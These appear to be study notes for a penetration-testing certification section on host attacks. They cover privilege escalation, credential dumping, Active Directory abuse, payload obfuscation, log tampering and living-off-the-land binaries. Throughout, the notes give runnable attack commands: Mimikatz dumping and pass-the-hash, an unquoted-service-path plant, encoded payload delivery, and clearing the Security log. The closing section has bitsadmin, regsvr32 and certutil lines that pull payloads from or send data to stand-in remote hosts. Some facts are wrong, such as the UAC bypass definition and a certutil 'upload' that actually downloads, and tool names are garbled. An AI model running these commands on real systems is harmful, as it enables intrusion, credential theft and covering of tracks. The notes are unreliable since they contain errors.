Section 19: Host Attacks

Host Attacks

• Host attacks involve methods to wreak havoc on systems.

• Important for penetration testing as they offer the quickest way to spread malware.

• Strategies are derived from viruses found in nature.

• Centered around domain four, attacks and exploits.

• Objective 4.4 is the main focus: perform post-exploitation attacks using appropriate tools given a scenario.

Privilege Escalation

• Techniques and tools to gain higher-level access on a system or network.

• Common methods: exploiting system vulnerabilities or configuration oversights.

• Hands-on demonstration using Metasploit for practical application.

Credential Harvesting

• Methods and tools to gather user credentials secretly.

• Tools covered: Mimikatz and Rubius.

Misconfigured Endpoints

• Identifying and exploiting common security misconfigurations using tools like PowerShell.

• Endpoints can be soft targets for initial access or lateral movement.

Unquoted Service Paths

• Specific Windows misconfiguration that allows attackers to gain higher privileges if services are improperly configured.

Disabling Security Software

• Techniques to disable or circumvent antivirus and other security applications to maintain persistence or avoid detection.

Payload Obfuscation

• Methods to make malware less detectable by security software through encryption, encoding, or other means.

User Account Control (UAC) Bypass

• Methods and tools to exploit web applications, manipulating input fields or search parameters to bypass client-side controls.

Shell and Kiosk Escape

• How hackers can break out of restricted environments provided by shells and kiosk mode applications.

• Techniques like DLL injection or process hollowing using tools like PSXS to run malicious code within legitimate processes.

Log Tampering

• How attackers can alter or delete logs to hide their activity and maintain presence on compromised hosts.

Living Off The Land (LOTL)

• Using the system's own features or legitimate software to conduct malicious activity, making detection harder.

Privilege Escalation in Detail

• Privilege escalation: gaining higher-level permissions than originally intended.

• Allows access to sensitive data or restricted actions.

• Exploits inherent trust and misconfigurations of operating systems and applications.

• Techniques include exploiting vulnerabilities, misconfigurations, and weak passwords.

• Types: vertical (user to admin) and horizontal (peer-level accounts).

Mimikatz

• Post-exploitation tool for extracting plaintext passwords, hashes, and Kerberos tickets from memory.

• Effective on Windows systems.

• Extracts credentials from memory to escalate privileges or move laterally.

• Example scenario: gaining admin access from a low-level user account.

Mimikatz Commands

• Extracting logon passwords: latex mimikatz # sekurlsa::logonpasswords

  • sekurlsa refers to the Windows component handling security credentials.

  • logonpasswords specifies the action of extracting logon passwords.

• Dumping hashes from the SAM file: latex mimikatz # lsadump::sam

  • lsadump refers to dumping information from the Local Security Authority.

  • sam refers to the Security Accounts Manager database.

• Performing a pass-the-hash attack: latex mimikatz # sekurlsa::pth /user:administrator /domain:example.com /ntlm:[NTLM hash] /run:cmd.exe

  • pth indicates the pass-the-hash attack.

  • /user:administrator specifies the target user account.

  • /domain:example.com identifies the Active Directory domain.

  • /ntlm:[NTLM hash] provides the NTLM hash of the administrator's password.

  • /run:cmd.exe launches a command prompt with elevated privileges.

Seatbelt

• C# tool for security-related checks on Windows systems.

• Automates finding misconfigurations and weak spots for privilege escalation.

• Example scenario: assessing a client's network security posture.

Seatbelt Commands

• Enumerate all checks:
  latex seatbelt.exe all

• Check for high-integrity processes:
  latex seatbelt.exe -group=checks_elevated

• List autorun executables:
  latex seatbelt.exe autoruns

PowerShell Integrated Scripting Environment (ISE)

• Graphical user interface for script creation, testing, and debugging in PowerShell.

• Used for various host-based attacks.

• Automates tasks like extracting system information, running exploitation modules, or creating backdoors.

• Example scenario: gathering detailed host information for privilege escalation.

Practical Applications

• Mimikatz: extracting credentials and performing pass-the-hash attacks.

• Seatbelt: automating the detection of system misconfigurations.

• PowerShell ISE: providing a user-friendly environment for scripting and executing host-based attacks.

Credential Harvesting and Dumping

• Credential harvesting: collecting user credentials through phishing or social engineering.

• Credential dumping: extracting credentials from a compromised system post-exploitation.

• Scenario: Penetration test for a financial institution.

  • Exploiting a known vulnerability (CVE-2021-34527) to gain server access.

Mimikatz for Credential Dumping

• Dumping credentials from the Local Security Authority Subsystem Service (LSA SS) process.

• Commands:
  latex mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords

• Results: usernames, plaintext passwords, or NTLM hashes.

Rubius for Kerberos Ticket Manipulation

• Used for pass-the-ticket attacks.

• Renewing a Ticket Granting Ticket (TGT).

• Command example: latex Rubeus.exe tgt::renew /user:admin /domain:banksecure.local /sid:[SID]

  • Rubeus.exe: executable name for the tool.

  • tgt::renew: specifies renewing a ticket granting ticket (TGT).

  • /user:admin: specifies the username for which the TGT is renewed.

  • /domain:banksecure.local: specifies the Active Directory domain.

  • /sid:[SID]: specifies the security identifier of the user account.

• Allows impersonating users and accessing network resources.

Post-Exploitation Actions

• Accessing sensitive financial data, modifying transactions, or creating admin accounts.

• Importance of robust security practices: patching, network segmentation, and multi-factor authentication.

Misconfigured Endpoints Explained

• Endpoints: devices connecting to a network (computers, servers, mobile devices).

• Misconfigured endpoints: weak passwords, unnecessary services, open ports.

• Scenario: Pen test on a corporate network, gaining access to a standard user's workstation.

Exploiting PowerShell

• PowerShell: powerful scripting language for task automation and configuration.

• Exploitation: using PowerShell if workstation security policies are not strictly enforced.

• Example: Running a service with system privileges that executes scripts from an insecure directory.

Lateral Movement with PSExec

• PSExec: tool from the Sysinternals suite to execute commands on remote systems.

• Exploitation: using PSExec to move laterally if remote command execution is allowed without proper controls.

• Scenario: gaining elevated privileges and accessing other machines using stored credentials.

• Real-world scenario: gaining access to a file server through PSExec and executing a malicious payload.

Unquoted Service Paths Explained

• Unquoted service paths: misconfiguration in how Windows services are defined.

• Vulnerability: Windows may incorrectly interpret the service path if it contains spaces and is not enclosed in quotation marks.

• Example: C:\Program Files\My Service\Service.exe

Detecting Unquoted Service Paths using PowerShell

• Using PowerShell to check service paths for spaces without quotes.

• Example script:
  powershell Get-Service | Where-Object {$_.StartType -eq "Automatic"} | ForEach-Object { if ($_.BinaryPathName -notlike '"*"' -and $_.BinaryPathName -like '* *') { Write-Host "Unquoted Service Path Found: $($_.Name) - $($_.BinaryPathName)" } }

• Detecting the vulnerability in a Finance Tracker service.

Exploiting Unquoted Service Paths using PSExec

• Placing a malicious executable in the root of the C drive.

• Command:
  latex psexec \\financesecurecorp -u brokerageaccount -p password cmd /c echo [Malicious Code] > C:\Program.exe

• Windows incorrectly executes program.exe with elevated privileges.

Disabling Security Controls

• Tools: PowerShell and PSExec.

• PowerShell: scripting language and command-line shell for task automation.

• PSExec: tool to execute processes on remote systems.

Payload Obfuscation Explained

• Payload obfuscation: disguising malicious payloads to avoid detection.

• Goal: make the payload less recognizable without changing functionality.

• Methods: encoding, encryption, compression, and code manipulation.

• PowerShell can be used to obfuscate payloads.

PowerShell for Payload Obfuscation

• Encoding with Base64:
  latex $payload = '[Malicious PowerShell Script]' $bytes = [System.Text.Encoding]::Unicode.GetBytes($payload) $encodedPayload = [Convert]::ToBase64String($bytes)

PSExec for Obfuscated Payload Delivery

• Executing obfuscated PowerShell scripts on remote machines.

• Command:
  latex psexec \\remotecomputer -s powershell.exe -encodedcommand [Base64 Encoded Payload]

Evil WinRM for Obfuscated Payload Delivery

• Connecting to a remote Windows computer via WinRM.

• Command:
  latex evil-winrm -i remotecomputer -u username -p password -s powershell -encodedcommand [Base64 Encoded Payload]

Targeting Active Directory Environments

• Tools: Certify, Rubius, and Evil WinRM.

AD Certificate Forgery with Certify

• ADCS: manages certificates for authentication, encryption, and other security functions.

• Certify: used to exploit misconfigured certificate templates.

• Scenario: large enterprise network relying on ADCS.

• Exploitation: requesting a certificate for a high-privilege service account.

Kerberos Manipulation with Rubius

• Kerberos: primary authentication protocol used by AD.

• Rubius: interacts with Kerberos tickets.

• Techniques: Pass-the-ticket attack, creating golden tickets.

Creating a Golden Ticket with Rubius

• Forging a TGT using the KRBTGT account hash.

• Impersonating anyone in the domain, including domain admins.

Post Exploitation with Evil WinRM

• Remote management using PowerShell remotely.

• Pivoting within the network after obtaining credentials.

Shell Escape and Kiosk Escape

• Shell escape: breaking out of restricted shell environments.

• Kiosk escape: bypassing restrictions on public or kiosk systems.

Shell Escape Techniques

• Exploiting a command that permits executing other programs.

• Using a text editor (vi or nano) to spawn a shell.

• PowerShell escape: using the Invoke-Expression commandlet.

• Command Example:
  latex Invoke-Expression -Command 'cmd.exe'

Kiosk Escape Techniques

• Exploiting vulnerabilities in allowed web browser applications.

• Using the Save As dialogue to access the file system.

• Downloading/uploading a PowerShell script.

Library and Process Injection

• Library and process injection: executing code within the address space of another process.

• Employed to evade detection, escalate privileges, or bypass security controls.

List of Injection:

• DLL Injection: loading a dynamic link library into the memory space of a target process.

• Process Hollowing: spawning a new process in a suspended state, replacing its memory with malicious code, and then resuming the process.

• Reflective DLL Injection: loading a DLL directly from memory without reading it to a disk.

• Remote Thread Injection: creating a new thread in a remote process and pointing it to a memory location that contains the malicious code.

EternalBlue

• Exploit that allows remote code execution with system-level approaches.

• Combining EternalBlue with process protection techniques to gain access on the target system.

Log Tampering

• Log tampering: modifying or deleting log files to cover the tracks of an attacker.

• Logs capture various events such as user credentials, file access, configuration changes, and network connections.

Techniques

• Deleting specific log entries.

• Modifying timestamps.

• Altering log data to create false records.

Using PowerShell for Log Tampering

• Interacting with Windows event logs.

• Clearing or manipulating logs with sufficient permissions.

• Command:
  latex Clear-EventLog -LogName Security

Using PSExec for Log Tampering

• Running PowerShell scripts or other commands on remote machines.

• Command:
  latex psexec \\remotecomputer -s powershell.exe -command "Clear-EventLog -LogName Security"

Living Off The Land (LOTL) Explained

• Living Off The Land Binaries (LoLBins): legitimate pre-installed tools and utilities.

• Used to perform actions without external malware.

• Avoids detection by security tools as the binaries are trusted.

Common LOLBins

• Gathering information with PowerShell:
  latex Get-Process | Out-File processes.txt

• External files transfer with bits admin:
  latex bitsadmin /transfer jobname /download /priority normal http://remoteserver/payload.exe C:\Windows\Temp\payload.exe

• Data execution with reg server32:
  Executing remote script using the regsvr32 command:
  latex regsvr32 /s /n /u /i:http://remoteserver/script.sct scrobj.dll

• Schedule task creation with schedule task /create:
  scheduling task to run malicious executables:
  latex schtasks /create /tn MaliciousTask /tr C:\Windows\Temp\payload.exe /sc onlogon /ru SYSTEM

Data exfiltration with cert util

• Encode sensitive information

certutil -encode in.txt out.b64

• Upload it to a remote server

  certutil -urlcache -split -f http://example.com/out.b64 C:\Windows\Temp\exfil.txt